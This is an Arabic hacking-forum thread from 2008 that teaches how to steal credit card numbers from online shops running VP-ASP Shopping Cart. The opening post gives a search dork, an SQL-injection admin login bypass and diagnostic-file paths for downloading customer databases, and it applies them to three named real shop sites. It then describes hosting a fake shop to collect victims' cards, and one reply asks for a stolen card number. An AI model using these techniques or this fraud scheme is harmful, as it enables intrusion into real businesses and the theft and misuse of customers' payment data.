بيت الهكر

منتديات امبراطورية الهكر العربية [بيت كل الهكرز]
 
الرئيسيةبيت الهكرمكتبة الصورس .و .جبحـثالمجموعاتالتسجيلدخول

شاطر | 
 

 للحصول على ارقام الفيزا فعاله

استعرض الموضوع السابق استعرض الموضوع التالي اذهب الى الأسفل 
كاتب الموضوعرسالة
TH£ Kill£R
-=فريق عمل بيت الهكر=-
-=فريق عمل بيت الهكر=-
avatar

عدد الرسائل : 31
العمر : 25
بلدك :
احترام قوانين المنتدى :
100 / 100100 / 100

السٌّمعَة : 6
تاريخ التسجيل : 09/08/2008

مُساهمةموضوع: للحصول على ارقام الفيزا فعاله   الأربعاء سبتمبر 03, 2008 5:25 pm

اول شئ روح لمواقع البحث
www.google.com
www.yahoo.com
------------------------------------------
ابحث عن هذه الكلمه الاتيه

inurl:shopadmin.asp


بعد ظهور المواقع الشوبينج
هنجرب 3 ثغرات واكيد كل المواقع من نوع VP-ASP Shopping Cart يمكن اختراقها او تحميل قواعد البيانات
اللي عليه الفيزا
-------------------------------------------
الثغره الاول

عن طريق كتابه في الاسم و باسورد الادمن

'or''='


الثغراه الثانيه هي في ملف
shopdbtest.asp


---------------------------
الثغره الثالثه
diag_dbtest.asp


-----------------------------------------
بدايه الدرس : هنطبق علي 3 مواقع شوبينج تم اختيرهم من طريق البحث السابقه
http://www.dieugenio.com/consignment/shopadmin.asp
http://www.erboristerialaurora.com/shopadmin.asp
http://fiberopticstuff.com/shopadmin.asp
----------------------------------------------------------------
اول شئ هجرب علي الموقع الثغره الاول

'or''='

http://www.dieugenio.com/consignment/shopadmin.asp

وهي ثغره في نظام 4 VP-ASP Shopping Cart




--------------------------------------------------------------
استخدام الثغره الثانيه

shopdbtest.asp

علي الموقع الاتي
http://www.erboristerialaurora.com/shopadmin.asp


بعد رفض الدخول بالثغره الاول



يظهر ليك الصفح دي



امسح كلمة shopadmin.asp وكتب بدلها shopdbtest.asp
هذه مثل
http://www.erboristerialaurora.com/shopadmin.asp
http://www.erboristerialaurora.com/shopdbtest.asp


الان هنشل كلمه shopdbtest.asp ونضع هنوان قاعد البيانات shopping.mdb
مثل
http://www.erboristerialaurora.com/shopdbtest.asp
http://www.erboristerialaurora.com/shopping.mdb
لان مبروك عليك تحميل قاعده بيانات الان
----------------------------------------------------
شرح الثغره الثالثه
http://fiberopticstuff.com/shopadmin.asp
بعد تجريب الثغره الاول و الثانيه هيتم رف الدخول شئ بعمل

يم مسح كلمه shopadmin.asp ونضع مكنها diag_dbtest.asp
http://fiberopticstuff.com/shopadmin.asp
http://fiberopticstuff.com/diag_dbtest.asp

لان هيظهر هذه الصفحه


بعد معرفت عنوان قاعد البيانات هنغير العنوان الي القاعده
هيتم مسح كلمه diag_dbtest.asp ونضع عنوان القاعده
http://fiberopticstuff.com/diag_dbtest.asp
http://fiberopticstuff.com/shopping500.mdb

مبروك علي تحميل القاعده


الدرس الثاني
كيف كشف ثغره المواقع الشوبينج بنفسك
واستخدام موقع شخصي لخداع الضحايه وجلب الفيزات

VP-ASP Shopping Cart

الان اذهب الي الموقع الرسمي
http://www.vpasp.com

وحمل نسخه برنامج VP-ASP Shopping Cart المجاني

بعد التحميل فك ضغط البرنامج ودخل عليه



الان دور علي اي ملف به كلمه test
بعد البحث في الصاده برنامج الشوبينج 5 تم وجود ملف

طيب الان بعد تحميل البرنامج متسحش البرنامج ولكن استفيد منه عن طريق رفع البرنامج الي موقع يدعم asp
واعمله لبيع الافلام و الاغاني ولم تخترق واحد افتح الموقع اكتير من مره علي شان يشترك وانت تاخود الفيزا

شرح كيف تنزيل صادرت الشوبينج علي الموقع
اشترك في موقع هذه
http://europe.*********matrixhosting.net/

هذه هو اقوي موقع استضافه لل asp

شرح عمل ملف Shop$config.asp
لان ادخل علي هذه الملف عن طرق برنامج Notepad

الان ارفع الملف الي الموقع بياعك وكتب كلمه
install.asp
اتبع التعليمات وهيكون عندك موقع وهمي لسرقه الفيزا
الرجوع الى أعلى الصفحة اذهب الى الأسفل
معاينة صفحة البيانات الشخصي للعضو
vi-vi
·÷±‡± (عضو جديد) ±‡±÷
·÷±‡± (عضو جديد) ±‡±÷


عدد الرسائل : 1
العمر : 27
مزاجك :
احترام قوانين المنتدى :
100 / 100100 / 100

السٌّمعَة : 0
تاريخ التسجيل : 06/09/2008

مُساهمةموضوع: رد: للحصول على ارقام الفيزا فعاله   السبت سبتمبر 06, 2008 3:48 am

ممكن تنزل ليي رقم فيزا صاحب الموضوع ضروري ضروري ياريت تنزلها لانه عندي مشكله في ايميل اختي يبغي رقم فيزا
تحياتي
الرجوع الى أعلى الصفحة اذهب الى الأسفل
معاينة صفحة البيانات الشخصي للعضو
Blue Dragon
-=فريق عمل بيت الهكر=-
-=فريق عمل بيت الهكر=-


عدد الرسائل : 46
العمر : 24
بلدك :
مزاجك :
احترام قوانين المنتدى :
0 / 1000 / 100

السٌّمعَة : 0
تاريخ التسجيل : 26/04/2010

مُساهمةموضوع: رد: للحصول على ارقام الفيزا فعاله   الإثنين يوليو 19, 2010 10:51 am

مشكور يا معلم موضوع مميز affraid
الرجوع الى أعلى الصفحة اذهب الى الأسفل
معاينة صفحة البيانات الشخصي للعضو http://hotmail-skype.tk/
 
للحصول على ارقام الفيزا فعاله
استعرض الموضوع السابق استعرض الموضوع التالي الرجوع الى أعلى الصفحة 
صفحة 1 من اصل 1

صلاحيات هذا المنتدى:لاتستطيع الرد على المواضيع في هذا المنتدى
بيت الهكر :: Websites , Lan & Wan Security :: حماية المواقع والمنتديات-
انتقل الى: